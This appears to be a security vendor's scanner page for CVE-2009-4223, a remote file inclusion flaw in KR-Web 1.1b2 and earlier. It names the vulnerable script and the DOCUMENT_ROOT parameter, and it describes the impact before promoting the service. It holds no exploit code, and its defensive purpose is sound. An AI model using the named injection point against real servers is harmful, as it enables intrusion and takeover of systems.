CVE-2009-4223 Scanner
CVE-2009-4223 scanner - Remote File Inclusion (RFI) vulnerability in KR-Web
Short Info
Level
High
Single Scan
Single Scan
Can be used by
Asset Owner
Estimated Time
15 seconds
Time Interval
1 month
Scan only one
URL
Toolbox
-
KR-Web is a web-based user interface designed for controlling and configuring Yealink IP phones. This product is usually used by system administrators in various organizations to monitor, manage, and configure their IP phones' settings through a web-based interface. The KR-Web interface provides access to various administrative functions, including call routing, logging, system configuration, and firmware upgrades.
CVE-2009-4223 is a security vulnerability that was detected in KR-Web 1.1b2 and earlier versions. This vulnerability is caused by a PHP remote file inclusion vulnerability in adm/krgourl.php. It allows attackers to execute malicious PHP code through a URL in the DOCUMENT_ROOT parameter. Furthermore, exploiting this vulnerability gives an attacker complete control over the system, including access to confidential data, unauthorized changes to system settings, and the execution of any arbitrary code on the affected system.
Exploiting the KR-Web vulnerability, CVE-2009-4223, can lead to severe consequences for the affected organization. Attackers could gain access to sensitive data or perform tasks such as stealing login credentials, accessing sensitive financial information, or installing malware on the victim's system. The attacker can use such access to launch further attacks through the network, potentially causing irreparable harm to the organization's reputation and financial health.
Thanks to the pro features of s4e.io, you can easily and quickly learn about vulnerabilities present in your digital assets. By using this platform, you can regularly scan your systems, identify vulnerabilities, and take necessary precautions to mitigate risks. We remind you never to underestimate the importance of security, even with trusted products like KR-Web. It is always best to stay proactive and vigilant in the face of evolving threats to keep your digital assets safe and secure.
REFERENCES
